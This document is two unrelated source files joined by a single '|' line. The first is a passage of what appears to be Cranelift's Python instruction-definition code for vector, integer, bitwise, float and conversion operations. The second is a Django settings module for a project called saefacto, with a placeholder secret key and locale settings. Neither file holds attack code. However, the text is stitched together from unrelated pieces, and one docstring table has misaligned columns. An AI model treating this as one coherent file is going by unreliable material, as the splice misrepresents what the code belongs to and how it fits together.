lo = Operand('lo', TxN.half_vector(), doc='Low-numbered lanes of `x`')
hi = Operand('hi', TxN.half_vector(), doc='High-numbered lanes of `x`')
vsplit = Instruction(
'vsplit', r"""
Split a vector into two halves.
Split the vector `x` into two separate values, each containing half of
the lanes from ``x``. The result may be two scalars if ``x`` only had
two lanes.
""",
ins=x, outs=(lo, hi), is_ghost=True)
Any128 = TypeVar(
'Any128', 'Any scalar or vector type with as most 128 lanes',
ints=True, floats=True, bools=True, scalars=True, simd=(1, 128))
x = Operand('x', Any128, doc='Low-numbered lanes')
y = Operand('y', Any128, doc='High-numbered lanes')
a = Operand('a', Any128.double_vector(), doc='Concatenation of `x` and `y`')
vconcat = Instruction(
'vconcat', r"""
Vector concatenation.
Return a vector formed by concatenating ``x`` and ``y``. The resulting
vector type has twice as many lanes as each of the inputs. The lanes of
``x`` appear as the low-numbered lanes, and the lanes of ``y`` become
the high-numbered lanes of ``a``.
It is possible to form a vector by concatenating two scalars.
""",
ins=(x, y), outs=a, is_ghost=True)
c = Operand('c', TxN.as_bool(), doc='Controlling vector')
x = Operand('x', TxN, doc='Value to use where `c` is true')
y = Operand('y', TxN, doc='Value to use where `c` is false')
a = Operand('a', TxN)
vselect = Instruction(
'vselect', r"""
Vector lane select.
Select lanes from ``x`` or ``y`` controlled by the lanes of the boolean
vector ``c``.
""",
ins=(c, x, y), outs=a)
x = Operand('x', TxN.lane_of())
splat = Instruction(
'splat', r"""
Vector splat.
Return a vector whose lanes are all ``x``.
""",
ins=x, outs=a)
x = Operand('x', TxN, doc='SIMD vector to modify')
y = Operand('y', TxN.lane_of(), doc='New lane value')
Idx = Operand('Idx', uimm8, doc='Lane index')
insertlane = Instruction(
'insertlane', r"""
Insert ``y`` as lane ``Idx`` in x.
The lane index, ``Idx``, is an immediate value, not an SSA value. It
must indicate a valid lane index for the type of ``x``.
""",
ins=(x, Idx, y), outs=a)
x = Operand('x', TxN)
a = Operand('a', TxN.lane_of())
extractlane = Instruction(
'extractlane', r"""
Extract lane ``Idx`` from ``x``.
The lane index, ``Idx``, is an immediate value, not an SSA value. It
must indicate a valid lane index for the type of ``x``.
""",
ins=(x, Idx), outs=a)
#
# Integer arithmetic
#
a = Operand('a', Int.as_bool())
Cond = Operand('Cond', intcc)
x = Operand('x', Int)
y = Operand('y', Int)
icmp = Instruction(
'icmp', r"""
Integer comparison.
The condition code determines if the operands are interpreted as signed
or unsigned integers.
====== ======== =========
Signed Unsigned Condition
====== ======== =========
eq eq Equal
ne ne Not equal
slt ult Less than
sge uge Greater than or equal
sgt ugt Greater than
sle ule Less than or equal
====== ======== =========
When this instruction compares integer vectors, it returns a boolean
vector of lane-wise comparisons.
""",
ins=(Cond, x, y), outs=a)
a = Operand('a', b1)
x = Operand('x', iB)
Y = Operand('Y', imm64)
icmp_imm = Instruction(
'icmp_imm', r"""
Compare scalar integer to a constant.
This is the same as the :inst:`icmp` instruction, except one operand is
an immediate constant.
This instruction can only compare scalars. Use :inst:`icmp` for
lane-wise vector comparisons.
""",
ins=(Cond, x, Y), outs=a)
f = Operand('f', iflags)
x = Operand('x', iB)
y = Operand('y', iB)
ifcmp = Instruction(
'ifcmp', r"""
Compare scalar integers and return flags.
Compare two scalar integer values and return integer CPU flags
representing the result.
""",
ins=(x, y), outs=f)
ifcmp_imm = Instruction(
'ifcmp_imm', r"""
Compare scalar integer to a constant and return flags.
Like :inst:`icmp_imm`, but returns integer CPU flags instead of testing
a specific condition code.
""",
ins=(x, Y), outs=f)
a = Operand('a', Int)
x = Operand('x', Int)
y = Operand('y', Int)
iadd = Instruction(
'iadd', r"""
Wrapping integer addition: :math:`a := x + y \pmod{2^B}`.
This instruction does not depend on the signed/unsigned interpretation
of the operands.
""",
ins=(x, y), outs=a)
isub = Instruction(
'isub', r"""
Wrapping integer subtraction: :math:`a := x - y \pmod{2^B}`.
This instruction does not depend on the signed/unsigned interpretation
of the operands.
""",
ins=(x, y), outs=a)
imul = Instruction(
'imul', r"""
Wrapping integer multiplication: :math:`a := x y \pmod{2^B}`.
This instruction does not depend on the signed/unsigned interpretation
of the
operands.
Polymorphic over all integer types (vector and scalar).
""",
ins=(x, y), outs=a)
umulhi = Instruction(
'umulhi', r"""
Unsigned integer multiplication, producing the high half of a
double-length result.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=a)
smulhi = Instruction(
'smulhi', """
Signed integer multiplication, producing the high half of a
double-length result.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=a)
udiv = Instruction(
'udiv', r"""
Unsigned integer division: :math:`a := \lfloor {x \over y} \rfloor`.
This operation traps if the divisor is zero.
""",
ins=(x, y), outs=a, can_trap=True)
sdiv = Instruction(
'sdiv', r"""
Signed integer division rounded toward zero: :math:`a := sign(xy)
\lfloor {|x| \over |y|}\rfloor`.
This operation traps if the divisor is zero, or if the result is not
representable in :math:`B` bits two's complement. This only happens
when :math:`x = -2^{B-1}, y = -1`.
""",
ins=(x, y), outs=a, can_trap=True)
urem = Instruction(
'urem', """
Unsigned integer remainder.
This operation traps if the divisor is zero.
""",
ins=(x, y), outs=a, can_trap=True)
srem = Instruction(
'srem', """
Signed integer remainder. The result has the sign of the dividend.
This operation traps if the divisor is zero.
""",
ins=(x, y), outs=a, can_trap=True)
a = Operand('a', iB)
x = Operand('x', iB)
Y = Operand('Y', imm64)
iadd_imm = Instruction(
'iadd_imm', """
Add immediate integer.
Same as :inst:`iadd`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
imul_imm = Instruction(
'imul_imm', """
Integer multiplication by immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
udiv_imm = Instruction(
'udiv_imm', """
Unsigned integer division by an immediate constant.
This operation traps if the divisor is zero.
""",
ins=(x, Y), outs=a)
sdiv_imm = Instruction(
'sdiv_imm', """
Signed integer division by an immediate constant.
This operation traps if the divisor is zero, or if the result is not
representable in :math:`B` bits two's complement. This only happens
when :math:`x = -2^{B-1}, Y = -1`.
""",
ins=(x, Y), outs=a)
urem_imm = Instruction(
'urem_imm', """
Unsigned integer remainder with immediate divisor.
This operation traps if the divisor is zero.
""",
ins=(x, Y), outs=a)
srem_imm = Instruction(
'srem_imm', """
Signed integer remainder with immediate divisor.
This operation traps if the divisor is zero.
""",
ins=(x, Y), outs=a)
irsub_imm = Instruction(
'irsub_imm', """
Immediate reverse wrapping subtraction: :math:`a := Y - x \\pmod{2^B}`.
Also works as integer negation when :math:`Y = 0`. Use :inst:`iadd_imm`
with a negative immediate operand for the reverse immediate
subtraction.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
#
# Integer arithmetic with carry and/or borrow.
#
a = Operand('a', iB)
x = Operand('x', iB)
y = Operand('y', iB)
c_in = Operand('c_in', b1, doc="Input carry flag")
c_out = Operand('c_out', b1, doc="Output carry flag")
b_in = Operand('b_in', b1, doc="Input borrow flag")
b_out = Operand('b_out', b1, doc="Output borrow flag")
iadd_cin = Instruction(
'iadd_cin', r"""
Add integers with carry in.
Same as :inst:`iadd` with an additional carry input. Computes:
.. math::
a = x + y + c_{in} \pmod 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, c_in), outs=a)
iadd_cout = Instruction(
'iadd_cout', r"""
Add integers with carry out.
Same as :inst:`iadd` with an additional carry output.
.. math::
a &= x + y \pmod 2^B \\
c_{out} &= x+y >= 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=(a, c_out))
iadd_carry = Instruction(
'iadd_carry', r"""
Add integers with carry in and out.
Same as :inst:`iadd` with an additional carry input and output.
.. math::
a &= x + y + c_{in} \pmod 2^B \\
c_{out} &= x + y + c_{in} >= 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, c_in), outs=(a, c_out))
isub_bin = Instruction(
'isub_bin', r"""
Subtract integers with borrow in.
Same as :inst:`isub` with an additional borrow flag input. Computes:
.. math::
a = x - (y + b_{in}) \pmod 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, b_in), outs=a)
isub_bout = Instruction(
'isub_bout', r"""
Subtract integers with borrow out.
Same as :inst:`isub` with an additional borrow flag output.
.. math::
a &= x - y \pmod 2^B \\
b_{out} &= x < y
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=(a, b_out))
isub_borrow = Instruction(
'isub_borrow', r"""
Subtract integers with borrow in and out.
Same as :inst:`isub` with an additional borrow flag input and output.
.. math::
a &= x - (y + b_{in}) \pmod 2^B \\
b_{out} &= x < y + b_{in}
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, b_in), outs=(a, b_out))
#
# Bitwise operations.
#
# TODO: Which types should permit boolean operations? Any reason to restrict?
bits = TypeVar(
'bits', 'Any integer, float, or boolean scalar or vector type',
ints=True, floats=True, bools=True, scalars=True, simd=True)
x = Operand('x', bits)
y = Operand('y', bits)
a = Operand('a', bits)
band = Instruction(
'band', """
Bitwise and.
""",
ins=(x, y), outs=a)
bor = Instruction(
'bor', """
Bitwise or.
""",
ins=(x, y), outs=a)
bxor = Instruction(
'bxor', """
Bitwise xor.
""",
ins=(x, y), outs=a)
bnot = Instruction(
'bnot', """
Bitwise not.
""",
ins=x, outs=a)
band_not = Instruction(
'band_not', """
Bitwise and not.
Computes `x & ~y`.
""",
ins=(x, y), outs=a)
bor_not = Instruction(
'bor_not', """
Bitwise or not.
Computes `x | ~y`.
""",
ins=(x, y), outs=a)
bxor_not = Instruction(
'bxor_not', """
Bitwise xor not.
Computes `x ^ ~y`.
""",
ins=(x, y), outs=a)
# Bitwise binary ops with immediate arg.
x = Operand('x', iB)
Y = Operand('Y', imm64)
a = Operand('a', iB)
band_imm = Instruction(
'band_imm', """
Bitwise and with immediate.
Same as :inst:`band`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
bor_imm = Instruction(
'bor_imm', """
Bitwise or with immediate.
Same as :inst:`bor`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
bxor_imm = Instruction(
'bxor_imm', """
Bitwise xor with immediate.
Same as :inst:`bxor`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
# Shift/rotate.
x = Operand('x', Int, doc='Scalar or vector value to shift')
y = Operand('y', iB, doc='Number of bits to shift')
Y = Operand('Y', imm64)
a = Operand('a', Int)
rotl = Instruction(
'rotl', r"""
Rotate left.
Rotate the bits in ``x`` by ``y`` places.
""",
ins=(x, y), outs=a)
rotr = Instruction(
'rotr', r"""
Rotate right.
Rotate the bits in ``x`` by ``y`` places.
""",
ins=(x, y), outs=a)
rotl_imm = Instruction(
'rotl_imm', r"""
Rotate left by immediate.
""",
ins=(x, Y), outs=a)
rotr_imm = Instruction(
'rotr_imm', r"""
Rotate right by immediate.
""",
ins=(x, Y), outs=a)
ishl = Instruction(
'ishl', r"""
Integer shift left. Shift the bits in ``x`` towards the MSB by ``y``
places. Shift in zero bits to the LSB.
The shift amount is masked to the size of ``x``.
When shifting a B-bits integer type, this instruction computes:
.. math::
s &:= y \pmod B, \\
a &:= x \cdot 2^s \pmod{2^B}.
""",
ins=(x, y), outs=a)
ushr = Instruction(
'ushr', r"""
Unsigned shift right. Shift bits in ``x`` towards the LSB by ``y``
places, shifting in zero bits to the MSB. Also called a *logical
shift*.
The shift amount is masked to the size of the register.
When shifting a B-bits integer type, this instruction computes:
.. math::
s &:= y \pmod B, \\
a &:= \lfloor x \cdot 2^{-s} \rfloor.
""",
ins=(x, y), outs=a)
sshr = Instruction(
'sshr', r"""
Signed shift right. Shift bits in ``x`` towards the LSB by ``y``
places, shifting in sign bits to the MSB. Also called an *arithmetic
shift*.
The shift amount is masked to the size of the register.
""",
ins=(x, y), outs=a)
ishl_imm = Instruction(
'ishl_imm', r"""
Integer shift left by immediate.
The shift amount is masked to the size of ``x``.
""",
ins=(x, Y), outs=a)
ushr_imm = Instruction(
'ushr_imm', r"""
Unsigned shift right by immediate.
The shift amount is masked to the size of the register.
""",
ins=(x, Y), outs=a)
sshr_imm = Instruction(
'sshr_imm', r"""
Signed shift right by immediate.
The shift amount is masked to the size of the register.
""",
ins=(x, Y), outs=a)
#
# Bit counting.
#
x = Operand('x', iB)
a = Operand('a', iB)
bitrev = Instruction(
'bitrev', r"""
Reverse the bits of a integer.
Reverses the bits in ``x``.
""",
ins=x, outs=a)
clz = Instruction(
'clz', r"""
Count leading zero bits.
Starting from the MSB in ``x``, count the number of zero bits before
reaching the first one bit. When ``x`` is zero, returns the size of x
in bits.
""",
ins=x, outs=a)
cls = Instruction(
'cls', r"""
Count leading sign bits.
Starting from the MSB after the sign bit in ``x``, count the number of
consecutive bits identical to the sign bit. When ``x`` is 0 or -1,
returns one less than the size of x in bits.
""",
ins=x, outs=a)
ctz = Instruction(
'ctz', r"""
Count trailing zeros.
Starting from the LSB in ``x``, count the number of zero bits before
reaching the first one bit. When ``x`` is zero, returns the size of x
in bits.
""",
ins=x, outs=a)
popcnt = Instruction(
'popcnt', r"""
Population count
Count the number of one bits in ``x``.
""",
ins=x, outs=a)
#
# Floating point.
#
Float = TypeVar(
'Float', 'A scalar or vector floating point number',
floats=True, simd=True)
fB = TypeVar('fB', 'A scalar floating point number', floats=True)
Cond = Operand('Cond', floatcc)
x = Operand('x', Float)
y = Operand('y', Float)
a = Operand('a', Float.as_bool())
fcmp = Instruction(
'fcmp', r"""
Floating point comparison.
Two IEEE 754-2008 floating point numbers, `x` and `y`, relate to each
other in exactly one of four ways:
== ==========================================
UN Unordered when one or both numbers is NaN.
EQ When :math:`x = y`. (And :math:`0.0 = -0.0`).
LT When :math:`x < y`.
GT When :math:`x > y`.
== ==========================================
The 14 :type:`floatcc` condition codes each correspond to a subset of
the four relations, except for the empty set which would always be
false, and the full set which would always be true.
The condition codes are divided into 7 'ordered' conditions which don't
include UN, and 7 unordered conditions which all include UN.
+-------+------------+---------+------------+-------------------------+
|Ordered |Unordered |Condition |
+=======+============+=========+============+=========================+
|ord |EQ | LT | GT|uno |UN |NaNs absent / present. |
+-------+------------+---------+------------+-------------------------+
|eq |EQ |ueq |UN | EQ |Equal |
+-------+------------+---------+------------+-------------------------+
|one |LT | GT |ne |UN | LT | GT|Not equal |
+-------+------------+---------+------------+-------------------------+
|lt |LT |ult |UN | LT |Less than |
+-------+------------+---------+------------+-------------------------+
|le |LT | EQ |ule |UN | LT | EQ|Less than or equal |
+-------+------------+---------+------------+-------------------------+
|gt |GT |ugt |UN | GT |Greater than |
+-------+------------+---------+------------+-------------------------+
|ge |GT | EQ |uge |UN | GT | EQ|Greater than or equal |
+-------+------------+---------+------------+-------------------------+
The standard C comparison operators, `<, <=, >, >=`, are all ordered,
so they are false if either operand is NaN. The C equality operator,
`==`, is ordered, and since inequality is defined as the logical
inverse it is *unordered*. They map to the :type:`floatcc` condition
codes as follows:
==== ====== ============
C `Cond` Subset
==== ====== ============
`==` eq EQ
`!=` ne UN | LT | GT
`<` lt LT
`<=` le LT | EQ
`>` gt GT
`>=` ge GT | EQ
==== ====== ============
This subset of condition codes also corresponds to the WebAssembly
floating point comparisons of the same name.
When this instruction compares floating point vectors, it returns a
boolean vector with the results of lane-wise comparisons.
""",
ins=(Cond, x, y), outs=a)
f = Operand('f', fflags)
ffcmp = Instruction(
'ffcmp', r"""
Floating point comparison returning flags.
Compares two numbers like :inst:`fcmp`, but returns floating point CPU
flags instead of testing a specific condition.
""",
ins=(x, y), outs=f)
x = Operand('x', Float)
y = Operand('y', Float)
z = Operand('z', Float)
a = Operand('a', Float, 'Result of applying operator to each lane')
fadd = Instruction(
'fadd', r"""
Floating point addition.
""",
ins=(x, y), outs=a)
fsub = Instruction(
'fsub', r"""
Floating point subtraction.
""",
ins=(x, y), outs=a)
fmul = Instruction(
'fmul', r"""
Floating point multiplication.
""",
ins=(x, y), outs=a)
fdiv = Instruction(
'fdiv', r"""
Floating point division.
Unlike the integer division instructions :clif:inst:`sdiv` and
:clif:inst:`udiv`, this can't trap. Division by zero is infinity or
NaN, depending on the dividend.
""",
ins=(x, y), outs=a)
sqrt = Instruction(
'sqrt', r"""
Floating point square root.
""",
ins=x, outs=a)
fma = Instruction(
'fma', r"""
Floating point fused multiply-and-add.
Computes :math:`a := xy+z` without any intermediate rounding of the
product.
""",
ins=(x, y, z), outs=a)
a = Operand('a', Float, '``x`` with its sign bit inverted')
fneg = Instruction(
'fneg', r"""
Floating point negation.
Note that this is a pure bitwise operation.
""",
ins=x, outs=a)
a = Operand('a', Float, '``x`` with its sign bit cleared')
fabs = Instruction(
'fabs', r"""
Floating point absolute value.
Note that this is a pure bitwise operation.
""",
ins=x, outs=a)
a = Operand('a', Float, '``x`` with its sign bit changed to that of ``y``')
fcopysign = Instruction(
'fcopysign', r"""
Floating point copy sign.
Note that this is a pure bitwise operation. The sign bit from ``y`` is
copied to the sign bit of ``x``.
""",
ins=(x, y), outs=a)
a = Operand('a', Float, 'The smaller of ``x`` and ``y``')
fmin = Instruction(
'fmin', r"""
Floating point minimum, propagating NaNs.
If either operand is NaN, this returns a NaN.
""",
ins=(x, y), outs=a)
a = Operand('a', Float, 'The larger of ``x`` and ``y``')
fmax = Instruction(
'fmax', r"""
Floating point maximum, propagating NaNs.
If either operand is NaN, this returns a NaN.
""",
ins=(x, y), outs=a)
a = Operand('a', Float, '``x`` rounded to integral value')
ceil = Instruction(
'ceil', r"""
Round floating point round to integral, towards positive infinity.
""",
ins=x, outs=a)
floor = Instruction(
'floor', r"""
Round floating point round to integral, towards negative infinity.
""",
ins=x, outs=a)
trunc = Instruction(
'trunc', r"""
Round floating point round to integral, towards zero.
""",
ins=x, outs=a)
nearest = Instruction(
'nearest', r"""
Round floating point round to integral, towards nearest with ties to
even.
""",
ins=x, outs=a)
#
# CPU flag operations
#
Cond = Operand('Cond', intcc)
f = Operand('f', iflags)
a = Operand('a', b1)
trueif = Instruction(
'trueif', r"""
Test integer CPU flags for a specific condition.
Check the CPU flags in ``f`` against the ``Cond`` condition code and
return true when the condition code is satisfied.
""",
ins=(Cond, f), outs=a)
Cond = Operand('Cond', floatcc)
f = Operand('f', fflags)
trueff = Instruction(
'trueff', r"""
Test floating point CPU flags for a specific condition.
Check the CPU flags in ``f`` against the ``Cond`` condition code and
return true when the condition code is satisfied.
""",
ins=(Cond, f), outs=a)
#
# Conversions
#
x = Operand('x', Mem)
a = Operand('a', MemTo, 'Bits of `x` reinterpreted')
bitcast = Instruction(
'bitcast', r"""
Reinterpret the bits in `x` as a different type.
The input and output types must be storable to memory and of the same
size. A bitcast is equivalent to storing one type and loading the other
type from the same address.
""",
ins=x, outs=a)
Bool = TypeVar(
'Bool',
'A scalar or vector boolean type',
bools=True, simd=True)
BoolTo = TypeVar(
'BoolTo',
'A smaller boolean type with the same number of lanes',
bools=True, simd=True)
x = Operand('x', Bool)
a = Operand('a', BoolTo)
breduce = Instruction(
'breduce', r"""
Convert `x` to a smaller boolean type in the platform-defined way.
The result type must have the same number of vector lanes as the input,
and each lane must not have more bits that the input lanes. If the
input and output types are the same, this is a no-op.
""", ins=x, outs=a, constraints=WiderOrEq(Bool, BoolTo))
BoolTo = TypeVar(
'BoolTo',
'A larger boolean type with the same number of lanes',
bools=True, simd=True)
x = Operand('x', Bool)
a = Operand('a', BoolTo)
bextend = Instruction(
'bextend', r"""
Convert `x` to a larger boolean type in the platform-defined way.
The result type must have the same number of vector lanes as the input,
and each lane must not have fewer bits that the input lanes. If the
input and output types are the same, this is a no-op.
""", ins=x, outs=a, constraints=WiderOrEq(BoolTo, Bool))
IntTo = TypeVar(
'IntTo', 'An integer type with the same number of lanes',
ints=True, simd=True)
x = Operand('x', Bool)
a = Operand('a', IntTo)
bint = Instruction(
'bint', r"""
Convert `x` to an integer.
True maps to 1 and false maps to 0. The result type must have the same
number of vector lanes as the input.
""", ins=x, outs=a)
bmask = Instruction(
'bmask', r"""
Convert `x` to an integer mask.
True maps to all 1s and false maps to all 0s. The result type must have
the same number of vector lanes as the input.
""", ins=x, outs=a)
Int = TypeVar('Int', 'A scalar or vector integer type', ints=True, simd=True)
IntTo = TypeVar(
'IntTo', 'A smaller integer type with the same number of lanes',
ints=True, simd=True)
x = Operand('x', Int)
a = Operand('a', IntTo)
ireduce = Instruction(
'ireduce', r"""
Convert `x` to a smaller integer type by dropping high bits.
Each lane in `x` is converted to a smaller integer type by discarding
the most significant bits. This is the same as reducing modulo
:math:`2^n`.
The result type must have the same number of vector lanes as the input,
and each lane must not have more bits that the input lanes. If the
input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(Int, IntTo))
IntTo = TypeVar(
'IntTo', 'A larger integer type with the same number of lanes',
ints=True, simd=True)
x = Operand('x', Int)
a = Operand('a', IntTo)
uextend = Instruction(
'uextend', r"""
Convert `x` to a larger integer type by zero-extending.
Each lane in `x` is converted to a larger integer type by adding
zeroes. The result has the same numerical value as `x` when both are
interpreted as unsigned integers.
The result type must have the same number of vector lanes as the input,
and each lane must not have fewer bits that the input lanes. If the
input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(IntTo, Int))
sextend = Instruction(
'sextend', r"""
Convert `x` to a larger integer type by sign-extending.
Each lane in `x` is converted to a larger integer type by replicating
the sign bit. The result has the same numerical value as `x` when both
are interpreted as signed integers.
The result type must have the same number of vector lanes as the input,
and each lane must not have fewer bits that the input lanes. If the
input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(IntTo, Int))
FloatTo = TypeVar(
'FloatTo', 'A scalar or vector floating point number',
floats=True, simd=True)
x = Operand('x', Float)
a = Operand('a', FloatTo)
fpromote = Instruction(
'fpromote', r"""
Convert `x` to a larger floating point format.
Each lane in `x` is converted to the destination floating point format.
This is an exact operation.
Cranelift currently only supports two floating point formats
- :type:`f32` and :type:`f64`. This may change in the future.
The result type must have the same number of vector lanes as the input,
and the result lanes must not have fewer bits than the input lanes. If
the input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(FloatTo, Float))
fdemote = Instruction(
'fdemote', r"""
Convert `x` to a smaller floating point format.
Each lane in `x` is converted to the destination floating point format
by rounding to nearest, ties to even.
Cranelift currently only supports two floating point formats
- :type:`f32` and :type:`f64`. This may change in the future.
The result type must have the same number of vector lanes as the input,
and the result lanes must not have more bits than the input lanes. If
the input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(Float, FloatTo))
x = Operand('x', Float)
a = Operand('a', IntTo)
fcvt_to_uint = Instruction(
'fcvt_to_uint', r"""
Convert floating point to unsigned integer.
Each lane in `x` is converted to an unsigned integer by rounding
towards zero. If `x` is NaN or if the unsigned integral value cannot be
represented in the result type, this instruction traps.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a, can_trap=True)
fcvt_to_uint_sat = Instruction(
'fcvt_to_uint_sat', r"""
Convert floating point to unsigned integer as fcvt_to_uint does, but
saturates the input instead of trapping. NaN and negative values are
converted to 0.
""",
ins=x, outs=a)
fcvt_to_sint = Instruction(
'fcvt_to_sint', r"""
Convert floating point to signed integer.
Each lane in `x` is converted to a signed integer by rounding towards
zero. If `x` is NaN or if the signed integral value cannot be
represented in the result type, this instruction traps.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a, can_trap=True)
fcvt_to_sint_sat = Instruction(
'fcvt_to_sint_sat', r"""
Convert floating point to signed integer as fcvt_to_sint does, but
saturates the input instead of trapping. NaN values are converted to 0.
""",
ins=x, outs=a)
x = Operand('x', Int)
a = Operand('a', FloatTo)
fcvt_from_uint = Instruction(
'fcvt_from_uint', r"""
Convert unsigned integer to floating point.
Each lane in `x` is interpreted as an unsigned integer and converted to
floating point using round to nearest, ties to even.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a)
fcvt_from_sint = Instruction(
'fcvt_from_sint', r"""
Convert signed integer to floating point.
Each lane in `x` is interpreted as a signed integer and converted to
floating point using round to nearest, ties to even.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a)
#
# Legalization helper instructions.
#
WideInt = TypeVar(
'WideInt', 'An integer type with lanes from `i16` upwards',
ints=(16, 64), simd=True)
x = Operand('x', WideInt)
lo = Operand(
'lo', WideInt.half_width(), 'The low bits of `x`')
hi = Operand(
'hi', WideInt.half_width(), 'The high bits of `x`')
isplit = Instruction(
'isplit', r"""
Split an integer into low and high parts.
Vectors of integers are split lane-wise, so the results have the same
number of lanes as the input, but the lanes are half the size.
Returns the low half of `x` and the high half of `x` as two independent
values.
""",
ins=x, outs=(lo, hi), is_ghost=True)
NarrowInt = TypeVar(
'NarrowInt', 'An integer type with lanes type to `i32`',
ints=(8, 32), simd=True)
lo = Operand('lo', NarrowInt)
hi = Operand('hi', NarrowInt)
a = Operand(
'a', NarrowInt.double_width(),
doc='The concatenation of `lo` and `hi`')
iconcat = Instruction(
'iconcat', r"""
Concatenate low and high bits to form a larger integer type.
Vectors of integers are concatenated lane-wise such that the result has
the same number of lanes as the inputs, but the lanes are twice the
size.
""",
ins=(lo, hi), outs=a, is_ghost=True)
GROUP.close()
|
# -*- coding: utf-8 -*-
"""
Django settings for saefacto project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import join
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
# TODO: Fix this where even if in Dev this class is called.
pass
from configurations import Configuration, values
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Common(Configuration):
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# 'suit',
# Admin
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'parsley',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'users', # custom users app
'core',
'main',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
INSTALLED_APPS += (
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = values.BooleanValue(False)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto')
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Araguaina'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
LANGUAGES = (
('pt-br', u'Português do Brasil'),
('en', 'English'),
('es', u'Español'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
